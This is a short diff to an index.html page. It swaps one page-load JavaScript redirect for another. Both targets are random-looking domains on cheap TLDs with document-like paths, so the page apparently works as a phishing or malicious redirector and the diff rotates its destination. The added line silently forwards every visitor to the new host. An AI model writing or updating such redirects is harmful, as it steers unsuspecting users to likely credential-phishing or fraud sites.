--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location.href ="https://gentiwnmlve.cfd/mydbm/cmdocs";</script>
+<script type="text/javascript">window.location.href ="https://frmdashboardnot.lat/rfmgrmgh/myfdml";</script>
